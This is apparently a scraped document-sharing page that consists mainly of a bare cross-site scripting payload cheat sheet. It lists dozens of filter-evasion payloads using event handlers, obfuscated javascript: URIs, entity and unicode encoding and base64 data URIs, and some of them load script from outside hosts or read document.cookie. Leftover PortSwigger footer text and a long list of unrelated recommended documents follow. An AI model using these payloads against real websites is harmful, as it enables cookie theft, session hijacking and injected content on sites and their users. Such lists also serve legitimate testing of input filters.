//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\

</script //|\\

</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</

font>/</style>

<a/href="javascript: javascript:prompt(1)"><input type="X">

</plaintext\></|\><plaintext/onmouseover=prompt(1)

</svg>''<svg><script

'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}

<a href="javascript&colon;\u0061l&#101%72t(1)"><button>

<div onmouseover='alert(1)'>DIV</div>

<iframe style="position:absolute;top:0;left:0;width:100%;height:100%"

onmouseover="prompt(1)">
<a href="jAvAsCrIpT&colon;alert(1)">X</a>

<embed

src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/

helloworld_js_X.pdf">

<object

data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/

helloworld_js_X.pdf">

<var onmouseover="prompt(1)">On Mouse Over</var>

<a href=javascript&colon;alert(document&period;cookie)>Click

Here</a>

<img src="/" =_=" title="onerror='prompt(1)'">

<%

<script src="data:text/javascript,alert(1)"></script>

<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<svg/onload=alert(1)

<input value=<><iframe/src=javascript:confirm(1)

<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

http://www.<script>alert(1)</script .com

<iframe

src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLin

e;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;

&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&

NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab

;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&

Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&

Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta

b;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;

&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&T

ab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab
;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;

&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&T

ab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab

;&Tab;&Tab;%29></iframe>

<svg><script ?>alert(1)

<iframe

src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l

&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

<img src=`xx:xx`onerror=alert(1)>

<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/

"></object>

<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>

<math><a xlink:href="//jsfiddle.net/t846h/">click

<embed code="http://businessinfo.co.uk/labs/xss/xss.swf"

allowscriptaccess=always>

<svg contentScriptType=text/vbs><script>MsgBox+1

<a href="data:text/html;base64_,<svg/onload=\

u0061l&#101%72t(1)>">X</a

<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')

worksinIE>

<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\

u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\

u0061')"></script a=\u0061 & /=%2F

<script/src=data&colon;text/j\u0061v\

u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

<object data=javascript&colon;\u0061l&#101%72t(1)>

<script>+-+-1-+-+alert(1)</script>

<body/onload=<!-->&#10alert(1)>

<script itworksinallbrowsers>/<script */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

<svg><script>//&NewLine;confirm(1);</script </svg>

<svg><script onlypossibleinopera:-)> alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa

href=j&#97v&#97script:&#97lert(1)>ClickMe

<script x> alert(1) </script 1=2

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

<script/src=&#100&#97&#116&#97:text/

&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,al&

#x0065;&#x00000072;t(1)></script>

<div style="position:absolute;top:0;left:0;width:100%;height:100%"

onmouseover="prompt(1)" onclick="alert(1)">x</button>

"><img src=x onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert(1)>CLICKME

<math><a xlink:href="//jsfiddle.net/t846h/">click

<object

data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C

%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

<a
href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#
61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#10
9&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&
#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

Vulnerabilities

Cross-site scripting (XSS)SQL injectionCross-site request forgeryXML

external entity injectionDirectory traversalServer-side request forgery

Customers

OrganizationsTestersDevelopers

Company

AboutPortSwigger NewsCareersContactLegalPrivacy Notice

Insights

Web Security AcademyBlogResearchThe Daily Swig

Follow us

© 2020 PortSwigger Ltd.

You might also like

Burps From My Butt
From Everand
Burps From My Butt
Marilyn Bricklin Lebovitz
No ratings yet
ውዳሴ-ማርያም-በአማርኛ-ዘሐመረ-ብርሃን-ቅዱስ-አባ-ሳሙኤል-ገዳም
Document209 pages
ውዳሴ-ማርያም-በአማርኛ-ዘሐመረ-ብርሃን-ቅዱስ-አባ-ሳሙኤል-ገዳም
kass kall
No ratings yet
Stranger on the Plane
From Everand
Stranger on the Plane
Janet Garber
No ratings yet
ውዳሴ-ማርያም-በአማርኛ-ዘሐመረ-ብርሃን-ቅዱስ-አባ-ሳሙኤል-ገዳም
Document159 pages
ውዳሴ-ማርያም-በአማርኛ-ዘሐመረ-ብርሃን-ቅዱስ-አባ-ሳሙኤል-ገዳም
Getachew Bekele
No ratings yet
Upload A Document - Scribd
Document295 pages
Upload A Document - Scribd
Om Londhe
No ratings yet
License Modificada
Document12 pages
License Modificada
Danilo Matteus
No ratings yet
123
Document15 pages
123
Cartoon / Anime
No ratings yet
! Created
Document40 pages
! Created
shayla malika
No ratings yet
Poc Xss Google
Document3 pages
Poc Xss Google
web phishing
No ratings yet
លិខិតធ្វើអំណោយផ្តាច់
Document299 pages
លិខិតធ្វើអំណោយផ្តាច់
Chhuon Narom
No ratings yet
Articulo Itc Vial
Document1,441 pages
Articulo Itc Vial
Leonard Castellanos
No ratings yet
Controle
Document2 pages
Controle
amorim.thiagor
No ratings yet
Untitled Diagram PDF
Document736 pages
Untitled Diagram PDF
Miguel Rodriguez
No ratings yet
XSSDetection
Document4 pages
XSSDetection
Francisco Jefferson Ferreira de Sá
No ratings yet
Shayari Box HTML Css
Document2 pages
Shayari Box HTML Css
SBV SBV
No ratings yet
WWW - cdss.CA - Gov Inforesources Calfresh 33
Document33 pages
WWW - cdss.CA - Gov Inforesources Calfresh 33
Sante Salvatore Diliberto
No ratings yet
Upload a Document _ Scribd
Document303 pages
Upload a Document _ Scribd
Rɩsʜʌɓʜ Sɘɱwʌɭ
No ratings yet
Thuyết trình Code 1tduong555
Document11 pages
Thuyết trình Code 1tduong555
ngvtrong200888
No ratings yet
MAP
Document2 pages
MAP
Oscar Alexander Lopez Gorozabel
No ratings yet
Casser le mot de passe BIOS wikiHow
Document988 pages
Casser le mot de passe BIOS wikiHow
GAITANG DURCEL
No ratings yet
ADD HOURS MINUTES SECONDS
Document68 pages
ADD HOURS MINUTES SECONDS
caje_mac6960
No ratings yet
PTC license document
Document26 pages
PTC license document
richakos
No ratings yet
WIDGET
Document16 pages
WIDGET
Gunzila Terakhir
No ratings yet
News 55498
Document65 pages
News 55498
Joao Jose
No ratings yet
Contrato Transfer Banamex - PDF - Bancos - Teléfonos Móviles - MHTML
Document492 pages
Contrato Transfer Banamex - PDF - Bancos - Teléfonos Móviles - MHTML
Hector Bermudez
No ratings yet
Correo
Document3 pages
Correo
Martin Ordoñez
No ratings yet
A REPORT Onretail Store Management HCL
Document179 pages
A REPORT Onretail Store Management HCL
upendra54321
No ratings yet
NX 7
Document32 pages
NX 7
nantha_24
No ratings yet
Civil Report
Document3,914 pages
Civil Report
Fredi BP
No ratings yet
303royal Script
Document6 pages
303royal Script
Lido 88
100% (1)
Material de Apoyo Obligaciones Financieras
Document392 pages
Material de Apoyo Obligaciones Financieras
Sandi Medina
No ratings yet
Taller Obligaciones Fras Cuotas Fijas
Document485 pages
Taller Obligaciones Fras Cuotas Fijas
Sandi Medina
No ratings yet
Mentor Graphics license file for Apollo 94de80085c83
Document169 pages
Mentor Graphics license file for Apollo 94de80085c83
Harwin Ignacio
No ratings yet
codigos
Document14 pages
codigos
odr4.loja1
No ratings yet
WWW
Document29 pages
WWW
asd
No ratings yet
Upload A Document - Scribd
Document274 pages
Upload A Document - Scribd
Luke Permejo
No ratings yet
Radar Es
Document1 page
Radar Es
internet
No ratings yet
SWTransferRequest 0000000000003486Q5HFFG98 566375875FB6GB9J
Document4 pages
SWTransferRequest 0000000000003486Q5HFFG98 566375875FB6GB9J
Luis Diego Gutierrez Alvarez
No ratings yet
7
Document2 pages
7
lisette
No ratings yet
Action Movie Recommendations
Document3 pages
Action Movie Recommendations
Programmer Life
No ratings yet
172
Document75 pages
172
quacksayssquawk
No ratings yet
DIKTAT Materi Pelajaran Matematika Kelas 1 SD - PDF
Document1,352 pages
DIKTAT Materi Pelajaran Matematika Kelas 1 SD - PDF
Muchammad Charish
No ratings yet
Unggah Dokumen - Scribd
Document269 pages
Unggah Dokumen - Scribd
Nanda Meisinta
No ratings yet
COLOR RAMP RESOURCES
Document26 pages
COLOR RAMP RESOURCES
mazzam75
No ratings yet
Bästa CV-byggaren Online - SkrivaCV
Document39 pages
Bästa CV-byggaren Online - SkrivaCV
Jax god
No ratings yet
Learning Groovy Script For Cloud Integration - Part 4
Document5 pages
Learning Groovy Script For Cloud Integration - Part 4
koizak3
No ratings yet
Survei Tentang Minat Siswa Terhadap Ekstrakurikuler Olahraga Pada Siswa Sma - SMK Se-Kecamatan Bajawa - Jurnal Ilmiah Citra Bakti Ngada NTT
Document353 pages
Survei Tentang Minat Siswa Terhadap Ekstrakurikuler Olahraga Pada Siswa Sma - SMK Se-Kecamatan Bajawa - Jurnal Ilmiah Citra Bakti Ngada NTT
Iwan Kancil
No ratings yet
Business Advanced
Document178 pages
Business Advanced
Anna Morar
No ratings yet
Dopamina_ qué es, función y síntomas
Document737 pages
Dopamina_ qué es, función y síntomas
gbautista.fuerte
No ratings yet
Pro License12
Document3 pages
Pro License12
Dương Nguyễn Thùy
No ratings yet
Seluruh Jalan Cerita Game Summertime Saga Indonesia - NafasKudaa - PDF
Document1,022 pages
Seluruh Jalan Cerita Game Summertime Saga Indonesia - NafasKudaa - PDF
Ken Kaneki
No ratings yet
Goal Wreakers United Golf Club
Document11 pages
Goal Wreakers United Golf Club
Sharona jack
No ratings yet
E-Sys 3.18 EST
Document27 pages
E-Sys 3.18 EST
Thanakiat Hasadinpaisal
No ratings yet
PhonePe's Fortnightly Online Sale
Document9 pages
PhonePe's Fortnightly Online Sale
ahg554
No ratings yet
BPM All Elements
Document9 pages
BPM All Elements
Andrea Munarin
No ratings yet
Tareas
Document1 page
Tareas
Edison Muñoz
No ratings yet
Transitions
Document3 pages
Transitions
wiberyosihuari
No ratings yet
Screencast 0
Document4 pages
Screencast 0
AMANDA SOF�A� AMPUERO RODR�GUEZ
No ratings yet
Colorimetria 2
Document191 pages
Colorimetria 2
Angelica maria Santacruz espinoza
No ratings yet
Caso Adicional de Persona Humana. Solución (2023-2Q)
Document439 pages
Caso Adicional de Persona Humana. Solución (2023-2Q)
Dante Saporiti
No ratings yet
Tutorial Looper en
Document4 pages
Tutorial Looper en
smox
100% (1)
IPFW Configure firewall and traffic shaping rules
Document2 pages
IPFW Configure firewall and traffic shaping rules
pynky22
80% (5)
Stronger Super Website Streaming Links
Document14 pages
Stronger Super Website Streaming Links
Wellington Onofre Puga Sanchez
No ratings yet
Ripping and Replacing Images From The Swfs
Document14 pages
Ripping and Replacing Images From The Swfs
luis calderon
No ratings yet
Tvlist
Document6 pages
Tvlist
Michael Cifuentes
No ratings yet
Xtream 18
Document4 pages
Xtream 18
mhmdmhmood1770
100% (1)
Iptv Freesky The Rock Upload
Document193 pages
Iptv Freesky The Rock Upload
Carlos Manoel
No ratings yet
Upgrade Flash Plugin to View Content
Document1 page
Upgrade Flash Plugin to View Content
Charina May Lagunde-Sabado
No ratings yet
Remove Adobe Shockwave and Director files and registry entries
Document1 page
Remove Adobe Shockwave and Director files and registry entries
LUCIANA SILVA
No ratings yet
rtmpdump commands to download cam shows
Document1 page
rtmpdump commands to download cam shows
Roger Carlos Alvarado
No ratings yet
Streaming and encoding with ffmpeg, GStreamer and V4L2
Document3 pages
Streaming and encoding with ffmpeg, GStreamer and V4L2
Edy
No ratings yet
Tvlist
Document11 pages
Tvlist
Dimuthu Ukwatta
No ratings yet
Serial Number Flash Cs3 N Corel x4
Document1 page
Serial Number Flash Cs3 N Corel x4
Eric Estrada
No ratings yet
Omsfe
Document7 pages
Omsfe
LuXe FTW
No ratings yet
2020 Houdini Learning
Document87 pages
2020 Houdini Learning
ky minh
No ratings yet
Commandcommand
Document2 pages
Commandcommand
Roger Carlos Alvarado
No ratings yet
Renderpeople Renderpoints Voucher PDF
Document1 page
Renderpeople Renderpoints Voucher PDF
Hamid Reza Salami
No ratings yet
Script X Ss Page
Document545 pages
Script X Ss Page
md alam
No ratings yet
IP TV Streaming
Document4 pages
IP TV Streaming
Stefanus Pribadi
No ratings yet
Resume for Web Designer
Document2 pages
Resume for Web Designer
Atul Gupta
No ratings yet
TVLIST
Document12 pages
TVLIST
Syed Azman
No ratings yet
Command 2
Document2 pages
Command 2
Roger Carlos Alvarado
No ratings yet
Tutorial Snake
Document6 pages
Tutorial Snake
Anonymous evHjsXn
No ratings yet
Listy M3u-18.04.23
Document8 pages
Listy M3u-18.04.23
Guero Mayate
No ratings yet
Userbouquet - Ilu XXX Adult
Document9 pages
Userbouquet - Ilu XXX Adult
j k
No ratings yet
Welcome To Anantapur District Official Website
Document3 pages
Welcome To Anantapur District Official Website
Raja Kammara
No ratings yet
M3u Links Iptv Free
Document6 pages
M3u Links Iptv Free
gihad
No ratings yet
SEO-Optimized Title for M3U Streaming Channels List
Document4 pages
SEO-Optimized Title for M3U Streaming Channels List
Carlota Almeida Garcia
No ratings yet
Woman Dog Intimate Playground
Document15 pages
Woman Dog Intimate Playground
Kalana Demel
No ratings yet
Pos Business Lookups
Document2 pages
Pos Business Lookups
Dinesh Singh Kunwar
No ratings yet
Building large scale web apps
From Everand
Building large scale web apps
Addy Osmani
No ratings yet
Excel Essentials: A Step-by-Step Guide with Pictures for Absolute Beginners to Master the Basics and Start Using Excel with Confidence
From Everand
Excel Essentials: A Step-by-Step Guide with Pictures for Absolute Beginners to Master the Basics and Start Using Excel with Confidence
Nigel Tillery
No ratings yet
Python Projects for Everyone
From Everand
Python Projects for Everyone
Mohamad Charara
No ratings yet
The New New Thing: A Silicon Valley Story
From Everand
The New New Thing: A Silicon Valley Story
Michael Lewis
Rating: 4 out of 5 stars
4/5 (359)
Learn Python Programming for Beginners: Best Step-by-Step Guide for Coding with Python, Great for Kids and Adults. Includes Practical Exercises on Data Analysis, Machine Learning and More.
From Everand
Learn Python Programming for Beginners: Best Step-by-Step Guide for Coding with Python, Great for Kids and Adults. Includes Practical Exercises on Data Analysis, Machine Learning and More.
Flynn Fisher
Rating: 5 out of 5 stars
5/5 (34)
Clean Code: A Handbook of Agile Software Craftsmanship
From Everand
Clean Code: A Handbook of Agile Software Craftsmanship
Robert C. Martin
Rating: 5 out of 5 stars
5/5 (13)
Learn SAP Basis in 24 Hours
From Everand
Learn SAP Basis in 24 Hours
Alex Nordeen
Rating: 4.5 out of 5 stars
4.5/5 (2)
C++ For Dummies
From Everand
C++ For Dummies
Stephen R. Davis
Rating: 3 out of 5 stars
3/5 (1)
The Easiest Way to Learn Design Patterns
From Everand
The Easiest Way to Learn Design Patterns
Fiodar Sazanavets
No ratings yet
Machine Learning: The Ultimate Beginner's Guide to Learn Machine Learning, Artificial Intelligence & Neural Networks Step by Step
From Everand
Machine Learning: The Ultimate Beginner's Guide to Learn Machine Learning, Artificial Intelligence & Neural Networks Step by Step
Ryan Turner
Rating: 4.5 out of 5 stars
4.5/5 (19)
Python Programming For Beginners: Learn The Basics Of Python Programming (Python Crash Course, Programming for Dummies)
From Everand
Python Programming For Beginners: Learn The Basics Of Python Programming (Python Crash Course, Programming for Dummies)
James Tudor
Rating: 5 out of 5 stars
5/5 (1)
Learn MongoDB in 24 Hours
From Everand
Learn MongoDB in 24 Hours
Alex Nordeen
Rating: 5 out of 5 stars
5/5 (2)
Linux: The Ultimate Beginner's Guide to Learn Linux Operating System, Command Line and Linux Programming Step by Step
From Everand
Linux: The Ultimate Beginner's Guide to Learn Linux Operating System, Command Line and Linux Programming Step by Step
Ryan Turner
Rating: 4.5 out of 5 stars
4.5/5 (9)
HTML & CSS: Learn the Fundaments in 7 Days
From Everand
HTML & CSS: Learn the Fundaments in 7 Days
Michael Knapp
Rating: 4 out of 5 stars
4/5 (20)
ITIL 4: Digital and IT strategy: Reference and study guide
From Everand
ITIL 4: Digital and IT strategy: Reference and study guide
David Cannon
Rating: 5 out of 5 stars
5/5 (1)
Power BI: Data Mastery Made Easy
From Everand
Power BI: Data Mastery Made Easy
Rob Botwright
No ratings yet
Nine Algorithms That Changed the Future: The Ingenious Ideas That Drive Today's Computers
From Everand
Nine Algorithms That Changed the Future: The Ingenious Ideas That Drive Today's Computers
John MacCormick
Rating: 5 out of 5 stars
5/5 (7)
Art of Clean Code: How to Write Codes for Human
From Everand
Art of Clean Code: How to Write Codes for Human
Roosnam Seefan
Rating: 3.5 out of 5 stars
3.5/5 (7)
HTML, CSS, & JavaScript All-in-One For Dummies
From Everand
HTML, CSS, & JavaScript All-in-One For Dummies
Paul McFedries
No ratings yet
Introducing Python: Modern Computing in Simple Packages, 2nd Edition
From Everand
Introducing Python: Modern Computing in Simple Packages, 2nd Edition
Bill Lubanovic
Rating: 4 out of 5 stars
4/5 (7)
Python Machine Learning By Example
From Everand
Python Machine Learning By Example
Yuxi (Hayden) Liu
Rating: 4 out of 5 stars
4/5 (6)
The JavaScript Workshop: Learn to develop interactive web applications with clean and maintainable JavaScript code
From Everand
The JavaScript Workshop: Learn to develop interactive web applications with clean and maintainable JavaScript code
Joseph Labrecque
Rating: 5 out of 5 stars
5/5 (3)
What Algorithms Want: Imagination in the Age of Computing
From Everand
What Algorithms Want: Imagination in the Age of Computing
Ed Finn
Rating: 3.5 out of 5 stars
3.5/5 (41)
Monitored: Business and Surveillance in a Time of Big Data
From Everand
Monitored: Business and Surveillance in a Time of Big Data
Peter Bloom
Rating: 4 out of 5 stars
4/5 (1)
Excel VBA: A Comprehensive, Step-By-Step Guide on Excel VBA Programming Tips and Tricks for Effective Strategies
From Everand
Excel VBA: A Comprehensive, Step-By-Step Guide on Excel VBA Programming Tips and Tricks for Effective Strategies
Peter Bradley
No ratings yet
Agile Metrics in Action: How to measure and improve team performance
From Everand
Agile Metrics in Action: How to measure and improve team performance
Christopher Davis
No ratings yet
Software Engineering at Google: Lessons Learned from Programming Over Time
From Everand
Software Engineering at Google: Lessons Learned from Programming Over Time
Titus Winters
Rating: 4 out of 5 stars
4/5 (11)
Grokking the Java Interview
From Everand
Grokking the Java Interview
Javin Paul
No ratings yet
Python Programming: Your Advanced Guide To Learn Python in 7 Days
From Everand
Python Programming: Your Advanced Guide To Learn Python in 7 Days
Maurice J. Thompson
No ratings yet
The PLC Programming Guide for Beginners
From Everand
The PLC Programming Guide for Beginners
Mark Splawn
No ratings yet